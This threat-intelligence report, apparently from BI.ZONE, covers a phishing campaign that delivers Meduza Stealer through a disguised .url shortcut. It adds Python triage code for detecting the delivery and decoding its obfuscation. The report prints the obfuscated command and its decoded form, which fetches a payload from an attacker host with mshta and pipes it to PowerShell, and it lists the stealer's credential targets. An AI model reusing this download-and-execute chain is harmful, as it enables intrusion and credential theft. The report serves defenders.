Stone Wolf employs Meduza Stealer to hack Russian companies
BI.ZONE Threat Intelligence reports an increase in criminal activity employing commercial malware available on underground resources. Recently, the researchers identified a malicious campaign by a cluster later dubbed Stone Wolf. The adversaries send out phishing emails on behalf of a legitimate provider of industrial automation solutions. The goal of the attackers is to deliver Meduza Stealer to the infrastructures of their interest.
Cybercriminals often disseminate phishing emails on behalf of large well‑known organizations. Recognizable logos and other elements of the brands’ visual identity help adversaries gain user trust and boost the chances for their malicious messages to be opened. It is important to remember that the brands cannot be liable for the actions of cybercriminals and associated damage.
- Adversaries continue to use archives with both malicious files and legitimate attachments which serve to distract the victim. This fact underscores the importance of raising awareness of adversary methods.
- By using the names and data of real organizations, attackers have a greater chance to trick their victims into downloading and opening malicious attachments. This tendency indicates the need for employees to undergo regular cybersecurity training.
- Attackers keep on expanding their arsenal of commercial malware. This once again highlights the importance of monitoring underground resources.
The adversaries disseminate an archive named Dostavka_Promautomatic.zip. The archive contains:
- a .p7s digital signature file
- a .docx legitimate document used as a decoy
- Scan_127-05_24_dostavka_13.05.2024.pdf.url, a malicious link to Meduza Stealer
Opening the malicious link triggers the loading and execution of a file hosted on a remote SMB server.
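A mail gateway or triage script can catch this delivery pattern before the user opens the archive. The following is an added example, not code from the report: it lists archive members whose shortcut extension hides behind a document extension and checks whether a .url member points at a file on a remote host. The extension sets, the sample member name delivery.docx.p7s, the host 192.0.2.10 and the share path are assumptions made for the illustration.

```python
import configparser
import io
import zipfile
from urllib.parse import urlparse

# Assumed extension sets for this example; tune them to your own mail policy.
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}
SHORTCUT_EXTS = {".url", ".lnk"}

def double_extension(name):
    """Return (decoy_ext, real_ext) for names like 'scan.pdf.url', else None."""
    parts = name.lower().rsplit(".", 2)
    if len(parts) == 3 and "." + parts[1] in DECOY_EXTS and "." + parts[2] in SHORTCUT_EXTS:
        return "." + parts[1], "." + parts[2]
    return None

def url_target(data):
    """Read URL= from an Internet Shortcut (.url), which is INI-formatted text."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(data.decode("utf-8-sig", errors="replace"))
    except configparser.Error:
        return None
    return parser.get("InternetShortcut", "URL", fallback=None)

def is_remote_file(target):
    """True for UNC paths and file:// URLs that name a remote host."""
    parsed = urlparse(target)
    return target.startswith("\\\\") or (parsed.scheme == "file" and bool(parsed.netloc))

def triage(zip_bytes):
    """List archive members whose shortcut extension hides behind a decoy one."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            exts = double_extension(info.filename)
            if exts:
                target = url_target(archive.read(info)) if exts[1] == ".url" else None
                findings.append({"member": info.filename, "shown_as": exts[0], "target": target,
                                 "remote_file": bool(target) and is_remote_file(target)})
    return findings

def sample_archive():
    """Constructed sample: the .url name follows the report, its target is a placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("delivery.docx.p7s", b"signature")
        archive.writestr("Scan_127-05_24_dostavka_13.05.2024.pdf.url",
                         b"[InternetShortcut]\r\nURL=file://192.0.2.10/share/placeholder.lnk\r\n")
    return buf.getvalue()
```

The detached-signature name delivery.docx.p7s is not flagged, because only a shortcut extension behind a document extension counts as a hit.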
The file is a Windows shortcut that runs the following command:
SyncAppvPublishingServer.vbs ;520,526,515,527,508,443,515,527,527,523,469,458,458,460,468,462,457,460,461,463,457,462,462,457,466,460,469,462,461,460,466,458,494,510,508,521,506,460,461,466,456,459,464,506,461,463,506,511,522,526,527,508,529,518,508,506,460,462,457,459,464,457,461,459,461,463,457,512,531,512|%{$p+=[char]($_-411)};$p | powershell -
Performing the subtraction operation transforms the command as follows:
SyncAppvPublishingServer.vbs ; mshta http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe | powershell -
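The subtraction step can be automated for triage of process command lines. The following is an added example, not code from the report or from BI.ZONE tooling: it finds an integer list followed by a `[char]($_-N)` decoder, recovers the plaintext, defangs IPv4 addresses in the result, and notes whether the decoded stage runs mshta against a URL. It handles only the `%{...}` form shown on this page; the function names are assumptions of the example.

```python
import re

# Stage format seen on this page: "<int>,<int>,...|%{$p+=[char]($_-N)};$p".
STAGE = re.compile(
    r"((?:\d{1,7},)+\d{1,7})\s*\|\s*%\s*\{[^}]*\[char\]\s*\(\s*\$_\s*-\s*(\d+)\s*\)",
    re.IGNORECASE,
)
IPV4 = re.compile(r"\b(\d{1,3}\.\d{1,3}\.\d{1,3})\.(\d{1,3})\b")
MSHTA_URL = re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.IGNORECASE)

def decode_stages(cmdline):
    """Return (key, plaintext) for each integer list with a [char]($_-key) decoder."""
    stages = []
    for match in STAGE.finditer(cmdline):
        key = int(match.group(2))
        codes = [int(n) - key for n in match.group(1).split(",")]
        if all(0 < c < 0x110000 for c in codes):  # skip lists that are not text
            stages.append((key, "".join(map(chr, codes))))
    return stages

def defang(text):
    """Bracket the last dot of IPv4 addresses so reports are not clickable."""
    return IPV4.sub(r"\1[.]\2", text)

def analyze(cmdline):
    """Summarize each decoded stage for an analyst or a detection pipeline."""
    return [
        {"key": key, "decoded": defang(plain), "mshta_from_url": bool(MSHTA_URL.search(plain))}
        for key, plain in decode_stages(cmdline)
    ]

# Command line as published in the report above.
SAMPLE = (
    "SyncAppvPublishingServer.vbs ;520,526,515,527,508,443,515,527,527,523,469,458,458,"
    "460,468,462,457,460,461,463,457,462,462,457,466,460,469,462,461,460,466,458,494,510,"
    "508,521,506,460,461,466,456,459,464,506,461,463,506,511,522,526,527,508,529,518,508,"
    "506,460,462,457,459,464,457,461,459,461,463,457,512,531,512"
    "|%{$p+=[char]($_-411)};$p | powershell -"
)

if __name__ == "__main__":
    for row in analyze(SAMPLE):
        print(row)
```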
The command downloads an HTA file named Scan_127-05_24_dostavka_13.05.2024.exe from a remote network location, executes the file with the help of MSHTA, and runs the command through the PowerShell interpreter. The command runs via WScript.Shell.Run([command]) and contains an AES‑encrypted payload for the PowerShell interpreter. The payload is decrypted at runtime and executed.
The decrypted script does the following:
- downloads the document from the remote network server http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.pdf and runs it
- downloads In2al5d P3in4er from the network server http://193.124.33[.]71:3217/scp231.exe and runs it
The files are saved into the folder C:\Users\[user]\Appdata\Roaming. Then the script searches for the file Scan_127-05_24_dostavka_13.05.2024.pdf.url and replaces it with the downloaded PDF file.
In2al5d P3in4er is used for downloading and running Meduza Stealer. This malware as a service first appeared on underground resources in June 2023. One‑month, three‑month, and lifetime subscriptions can be purchased for $199, $399, and $1,199, respectively. In March 2024, additional options became available, including the loader (presumably, In2al5d P3in4er) and a dedicated server with a range of variables (the number of cores, size of RAM, and amount of disk space).
Purchasers receive a builder and a web panel that enables them to monitor data collected from victim devices. According to the Meduza Stealer developers, the executable file contains an anti‑CIS module which restricts attacks in the region. However, there is no such restriction in the malware sample obtained by the BI.ZONE Threat Intelligence team.
If the malware cannot connect to the C2 server, the program terminates.
In the compromised system, the stealer retrieves data on the operating system version, device name and time zone, RAM capacity, processor, graphic adapter, screen resolution (with a screen snapshot), as well as the device’s public IP address by sending a query to https://api.ipify[.]org.
The stealer also collects the following data:
- account credentials saved in Outlook
- account credentials from browsers (Chrome, Edge, Comodo, Atom, Yandex, etc.)
- account credentials from crypto wallets (Coinomi, Exodus, Ethereum, etc.)
- list of installed applications by accessing the registry hive HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
- Telegram and Steam sessions, a Discord token
- account credentials from password managers (1Password, GAuth, NordPass, etc.)
- Windows Credential Manager and Windows Vault data retrieved via WinAPI functions (VaultEnumerateVaults, VaultOpenVault)
- list of active processes retrieved via WinAPI functions (CreateToolhelp32Snapshot, Process32FirstW, Process32NextW)
The collected data is sent to the control server via TCP.
Tactic | Technique | Procedure |
---|---|---|
Initial Access | Phishing: Spearphishing Attachment | Uses phishing emails with malicious attachments to gain initial access |
Execution | User Execution: Malicious File | Prompts the victim to run the malicious file to initiate the compromise process |
Execution | Command and Scripting Interpreter: PowerShell | Employs PowerShell to run commands and scripts |
Execution | Command and Scripting Interpreter: Visual Basic | Employs VBScript to run commands and scripts |
Defense Evasion | Deobfuscate/Decode Files or Information | Deobfuscates the commands and scripts being launched |
Defense Evasion | Impersonation | Sends out phishing emails on behalf of a real organization |
Defense Evasion | Masquerading: Double File Extension | Uses double extension to masquerade the malicious file |
Defense Evasion | System Binary Proxy Execution: Mshta | Uses MSHTA to run malicious files |
Credential Access | Credentials from Password Stores: Credentials from Web Browsers | Retrieves authentication data from web browsers |
Credential Access | Credentials from Password Stores: Windows Credential Manager | Retrieves authentication data from Windows Credential Manager |
Credential Access | Credentials from Password Stores: Password Managers | Retrieves authentication data from password managers |
Credential Access | Unsecured Credentials: Credentials In Files | Retrieves authentication data from files |
Credential Access | Unsecured Credentials: Credentials in Registry | Retrieves authentication data from the registry |
Discovery | Process Discovery | Collects information about the running processes |
Discovery | System Information Discovery | Collects information about the compromised system |
Command and Control | Non-Application Layer Protocol | Uses TCP to communicate with the C2 server |
Command and Control | Ingress Tool Transfer | Transfers the malware to the compromised system |
Exfiltration | Automated Exfiltration | Automatically exfiltrates the collected data |
Exfiltration | Exfiltration Over C2 Channel | Transfers the collected data to the C2 server |
The BI.ZONE EDR rules below can help organizations detect the described malicious activity:
- win_execution_or_open_file_with_double_extension
- win_use_mshta_to_run_hta_from_url
- win_access_to_ip_detection_service
- win_possible_browser_stealer_activity
- win_suspicious_access_to_password_manager_files
Adversaries can bypass preventive security solutions and penetrate the infrastructure unnoticed. It is crucial to neutralize threats before they cause significant damage to business. To protect your company against advanced threats, we recommend implementing endpoint detection and response practices; for instance, BI.ZONE EDR. The service enables early detection of attacks and immediate incident response, either automated or manual.
To stay ahead of threat actors, you need to be aware of the methods they use when attacking various infrastructures. Understanding the real threat landscape is a massive advantage against adversity. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. The solution provides information about the current attacks, threat actors, their methods and tools. This data helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.